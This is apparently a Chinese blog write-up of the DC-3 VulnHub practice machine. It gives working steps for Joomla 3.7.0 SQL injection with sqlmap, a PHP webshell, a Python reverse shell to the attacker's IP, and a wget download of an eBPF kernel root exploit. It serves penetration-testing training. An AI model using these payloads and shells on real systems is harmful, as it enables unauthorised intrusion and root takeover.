Dc-3靶机渗透

靶机地址:https://www.vulnhub.com/entry/dc-32,312/

难度: 低

目标: 获得 root 权限 + flag

DC-3是VulnHub推出的渗透测试靶机,主要用于测试Web应用安全和渗透测试技能。

        其特点是仅开放80端口,运行Apache Web服务器和Joomla CMS,适合初学者练习信息收集、漏洞扫描和权限提升等基础渗透技巧。

基础环境搭建

  从VulnHub官网或第三方平台获取DC-3靶机镜像文件(如DC-3.zip),并解压至VMware或Kali虚拟机中。

  :将靶机与攻击机设置为同一NAT模式或桥接模式,确保攻击机与靶机处于同一局域网。 ‌

  IP使用nmap扫描靶机IP范围(如192.168.96.128/24),确定靶机真实IP(如192.168.96.131)和攻击机IP(如192.168.96.128)。

渗透步骤

  信息收集

       使用nmap全面扫描靶机端口和服务,确认80端口开放并识别出Apache/Joomla环境。 ‌

       通过浏览器访问靶机IP(如http://192.168.96.131),观察首页提示信息。

  漏洞扫描与利

       安装:ml-search-more[JoomScan]{text="JoomScan"}工具(通过Kali包管理器安装),针对Joomla CMS进行专项扫描,获取后台地址(如/administrator/)。

       使用:ml-search-more[nikto]{text="nikto"}扫描Web漏洞或配置错误。

  权限提

       尝试弱口令登录后台或利用Joomla已知漏洞(如组件漏洞、配置错误)获取管理员权限。

       若无法直接突破,可尝试文件上传、SQL注入等常规攻击手段。

注意事项

   该靶机设计简单,主要考验基础渗透技能,建议结合工具使用(如nmap、JoomScan、nikto)而非纯手工操作。

   若需增加挑战难度,可尝试关闭辅助提示或调整攻击路径

https://developer.aliyun.com/article/1362873  //相关文档

信息收集

主机发现

1.查看网段

ipconfig

192.68.65.132

主机在192.168.65.0网段

2.主机发现

nmap -sn 192.168.65.0/24

└─# nmap -sn 192.168.65.0/24

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:17 EDT

Nmap scan report for 192.168.65.1

Host is up (0.00020s latency).

MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.65.2

Host is up (0.00012s latency).

MAC Address: 00:50:56:FA:BF:D8 (VMware)

Nmap scan report for 192.168.65.147

Host is up (0.00017s latency).

MAC Address: 00:0C:29:4E:5A:03 (VMware)

Nmap scan report for 192.168.65.254

Host is up (0.0049s latency).

MAC Address: 00:50:56:F5:D2:FC (VMware)

Nmap scan report for 192.168.65.132

Host is up.

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.40 seconds

了解到自己的主机结构所以我们的主机是

192.168.65.147

3.端口扫描

nmap -sT --min-rate 10000 -p- 192.168.65.147

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:19 EDT

Nmap scan report for 192.168.65.147

Host is up (0.0017s latency).

Not shown: 65534 closed tcp ports (conn-refused)

PORT   STATE SERVICE

80/tcp open  http

MAC Address: 00:0C:29:4E:5A:03 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

Tcp扫描

nmap -sT -sV -sC -O -p80 192.168.65.147

└─# nmap -sT -sV -sC -O -p80 192.168.65.147

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:31 EDT

Nmap scan report for 192.168.65.147

Host is up (0.00042s latency).

PORT   STATE SERVICE VERSION

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-generator: Joomla! - Open Source Content Management

|_http-title: Home

MAC Address: 00:0C:29:4E:5A:03 (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds

分析

主机状态

IP:192.168.65.147

状态:up,延迟 0.42 ms

MAC:00:0C:29:4E:5A:03(VMware 虚拟机)

端口/服务

80/tcp open

服务:http

软件:Apache httpd 2.4.18 (Ubuntu)

CMS:Joomla!(开源内容管理系统)

页面标题:Home

Server 头:Apache/2.4.18 (Ubuntu)

系统指纹

OS 类型:Linux 3.x – 4.x(大概率 Ubuntu 16.04 内核 4.4)

网络

距离:1 hop(同一网段)

下一步建议

Web 渗透:Joomla 3.x 默认路径 /administrator;用 joomscan 或 joomla-cves 扫漏洞。

目录爆破:gobuster/dirb 扫 http://192.168.65.147/ 找备份、配置、上传点。

获取 shell:若 Joomla 版本 ≤ 3.4.6 可试 CVE-2015-8562 反序列化;≤ 3.7.0 可试 SQL 注入 CVE-2017-8917。

UDP扫描****

nmap -sU --top-ports 20 192.168.65.147

默认脚本扫描

nmap --script=vuln -p80 192.168.65.147


扫描不出来

web渗透

用浏览器打开是这样的

没有任何头绪,我们前面提到爆破我门尝试爆破

目录爆破

dirsearch -u http://192.168.65.147

我们发现有

/administrator/

查看历史漏洞

先用joomscan

1.JoomScan 是一款 开源、专门面向 Joomla CMS 的漏洞扫描器

在kali中直接安装

sudo apt update && sudo apt install joomscan

基础使用

# 基础扫描

joomscan -u http://192.168.65.147

# 同时暴力枚举组件

joomscan -u http://192.168.65.147 --enumerate-components

# 通过代理扫描

joomscan -u http://192.168.65.147 --proxy http://127.0.0.1:8080

发现版本

查找漏洞

searchsploit Joomla 3.7.0

存在sql注入我们下载文档来看看

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt .


└─# cat 42033.txt

# Exploit Title: Joomla 3.7.0 - Sql Injection

# Date: 05-19-2017

# Exploit Author: Mateus Lino

# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

# Vendor Homepage: https://www.joomla.org/

# Version: = 3.7.0

# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux

# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)

    Type: boolean-based blind

    Title: Boolean-based blind - Parameter replace (DUAL)

    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based

    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)

    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)

    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

我们使用sqlmap去尝试注入

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

我们发现

joomladb库


└─# sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

然后直接注入数据库查看账号密码

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

获取密码和账号

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump



+----------+--------------------------------------------------------------+

| username | password                                                     |

+----------+--------------------------------------------------------------+

| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |

+----------+--------------------------------------------------------------+

用hash去解

得到密码

snoopy

反弹shell

去创建一个文件

写入一句话木马

<?php system($_GET['cmd']);?>

访问路径

/templates/protostar/shell.php?cmd=id

查看有没有python3

which python3

成功返回

构造反弹shell

python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("192.168.65.132",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

成功返回

提权

查看系统版本

www-data@DC-3:/var/www/html/templates/protostar$ uname -a

uname -a

Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

www-data@DC-3:/var/www/html/templates/protostar$ lsb_release -a

lsb_release -a

No LSB modules are available.

Distributor ID: Ubuntu

Description:    Ubuntu 16.04 LTS

Release:        16.04

Codename:       xenial

查看历史漏洞

searchsploit Ubuntu 16.04



linux/local/39772.txt

先把文件cp下来

cp /usr/share/exploitdb/exploits/linux/local/39772.txt .

cat

─# cat 39772.txt

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the

kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,

unprivileged code can use the bpf() syscall to load eBPF socket filter programs.

These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first

function that touches the supplied eBPF instructions is

replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF

map file descriptors and looks up pointers for the corresponding map files.

This is done as follows:

        /* look for pseudo eBPF instructions that access map FDs and

         * replace them with actual map pointers

         */

        static int replace_map_fd_with_map_ptr(struct verifier_env *env)

        {

                struct bpf_insn *insn = env->prog->insnsi;

                int insn_cnt = env->prog->len;

                int i, j;

                for (i = 0; i < insn_cnt; i++, insn++) {

                        [checks for bad instructions]

                        if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {

                                struct bpf_map *map;

                                struct fd f;

                                [checks for bad instructions]

                                f = fdget(insn->imm);

                                map = __bpf_map_get(f);

                                if (IS_ERR(map)) {

                                        verbose("fd %d is not pointing to valid bpf_map\n",

                                                insn->imm);

                                        fdput(f);

                                        return PTR_ERR(map);

                                }

                                [...]

                        }

                }

                [...]

        }

__bpf_map_get contains the following code:

/* if error is returned, fd is released.

 * On success caller should complete fd access with matching fdput()

 */

struct bpf_map *__bpf_map_get(struct fd f)

{

        if (!f.file)

                return ERR_PTR(-EBADF);

        if (f.file->f_op != &bpf_map_fops) {

                fdput(f);

                return ERR_PTR(-EINVAL);

        }

        return f.file->private_data;

}

The problem is that when the caller supplies a file descriptor number referring

to a struct file that is not an eBPF map, both __bpf_map_get() and

replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If

__fget_light() detected that the file descriptor table is shared with another

task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause

the reference count of the struct file to be over-decremented, allowing an

attacker to create a use-after-free situation where a struct file is freed

although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with

memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a

write operation on it, wait for the kernel to verify the file's writability,

then free the writable file and open a readonly file that is allocated in the

same place before the kernel writes into the freed file, allowing an attacker

to write data to a readonly file. By e.g. writing to /etc/crontab, root

privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated

struct file is located at the same address as the previously freed one. Linux

provides a syscall that performs exactly this comparison for the caller:

kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to

pause code execution in the kernel between the writability check of the target

file and the actual write operation. This can be done by abusing the writev()

syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays

read accesses, then mmap()s a file containing a struct iovec from that FUSE

filesystem and passes the result of mmap() to writev(). (Another way to do this

would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to

the file descriptor number and then calls vfs_writev(). vfs_writev() verifies

that the target file is writable, then calls do_readv_writev(), which first

copies the struct iovec from userspace using import_iovec(), then performs the

rest of the write operation. Because import_iovec() performs a userspace memory

access, it may have to wait for pages to be faulted in - and in this case, it

has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,

allowing the attacker to suspend code execution in the kernel at that point

arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh

user@host:~/ebpf_mapfd_doubleput$ ./doubleput

starting writev

woohoo, got pointer reuse

writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.

suid file detected, launching rootshell...

we have root privs now...

root@host:~/ebpf_mapfd_doubleput# id

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7

Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552

Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

把包下载下来

 wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip


在kali主机上开启监听

python -m http.server 80 

下载下来

wget http://192.168.65.132/39772.zip

uzip 解压

tar -xf exploit.tar

利用

.txt文件已经给出



user@host:~/ebpf_mapfd_doubleput$ ./compile.sh

user@host:~/ebpf_mapfd_doubleput$ ./doubleput


www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh

./compile.sh

doubleput.c: In function 'make_setuid':

doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]

    .insns = (__aligned_u64) insns,

             ^

doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]

    .license = (__aligned_u64)""

               ^

www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls

ls

compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c

www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput

./doubleput

提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

成功拿下

Dc-3靶机渗透的更多相关文章

  1. DC 1-3 靶机渗透

    DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...

  2. vulnhub-DC:2靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  3. vulnhub-DC:1靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  4. vulnhub-DC:3靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/ 导入到vmware 导入的时候遇到一个问题 解决方法: 点 "虚拟机" ...

  5. vulnhub-DC:4靶机渗透记录

    准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...

  6. vulnhub-DC:5靶机渗透记录

    准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  7. vulnhub-DC:6靶机渗透记录

    准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  8. vulnhub-DC:7靶机渗透记录

    准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...

  9. DC-1 靶机渗透测试

    DC-1靶机渗透测试 对着镜子大喊三声"太菜了""太菜了""太菜了" DC系列靶机的第一篇.边学习边日靶机边进步,摸爬滚打着前行. 内容不只 ...

  10. vulnhub-DC:8靶机渗透记录

    准备工作 在vulnhub官网下载DC:8靶机DC: 8 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

随机推荐

  1. SciTech-Mathmatics-Probability+Statistics-Conditional Probability + Bayes Theorem+App.: 条件概率+Bayes原理及应用:广告邮件分类

    SciTech-Mathmatics-Probability+Statistics Conditional Probability + Bayes Formula: Application: Cond ...

  2. SicTech-Math-Stolz-Cesaro Theorem + L'Hopital Rule

    https://math.stackexchange.com/questions/109069/stolz-cesàro-theorem?noredirect=1 https://planetmath ...

  3. 进阶篇:3.3.1)DFM铸造-压铸件设计

    本章目的:设计符合压铸工艺的零件,不再犯简单错误,不必再为反复修改模具而烦恼. 1.基础阅读: 进阶篇:2)DFMA的介绍 进阶篇:2.3)DFMA的运用方法(个人方法) 2.压铸的概念 2.1 压铸 ...

  4. Unity开源搜索引擎

    https://unitylist.com/

  5. P1763 埃及分数(小理解,后续补充线性方程优化)

    P1763 埃及分数 1.读题: 将一个真分数表示为一堆分子为 \(1\) 的分式相加,其中我们可以简单概括为 \[\frac{a}{b} = \frac{1}{x_1} + \frac{1}{x_2 ...

  6. 微服务Token鉴权的7种方案

    前言 最近有球友问我:微服务中Token鉴权除了使用JWT之外,还有什么其他的方案? 今天这篇文章跟大家一起聊聊微服务Token鉴权的7种方案,希望对会有所帮助. 1. 为什么必须做Token鉴权? ...

  7. 一步一步学习使用LiveBindings(6) 实现Master-Detail主从关系的绑定

    一步一步学习使用LiveBindings(6) 实现Master-Detail主从关系的绑定 主从式数据在应用程序的开发中是非常常见的,比如员工和电子邮件地址记录,一个员工可能对应到多个邮件地址,这就 ...

  8. 前端使用highcharts报错“Error: Highcharts error #13”

    报错情况如下: 错误原因: 查找了下这个错误,图形容器无法找到,会导致报这个错误,两个页面都在使用同一个容器id时可能也会导致这样的问题,我遇到的是后者....所以就改了一id然后就成功解决 如果是前 ...

  9. Attention&追憶

    --夏日将逝-- 刀剑神域还是太谔谔了,毕竟有桐人. "感觉里面都注有灵魂--" "u just want attention--" 不择手段到了yueyue的 ...

  10. scheduler报错: Failed to watch *v1beta1.PodDisruptionBudget: failed to list *v1beta1.PodDisruptionBudget, no kind "KubeSchedulerConfiguration" is registered for version "componentconfig/v1alpha1"

    问题 Failed to watch *v1beta1.PodDisruptionBudget: failed to list *v1beta1.PodDisruptionBudget: the se ...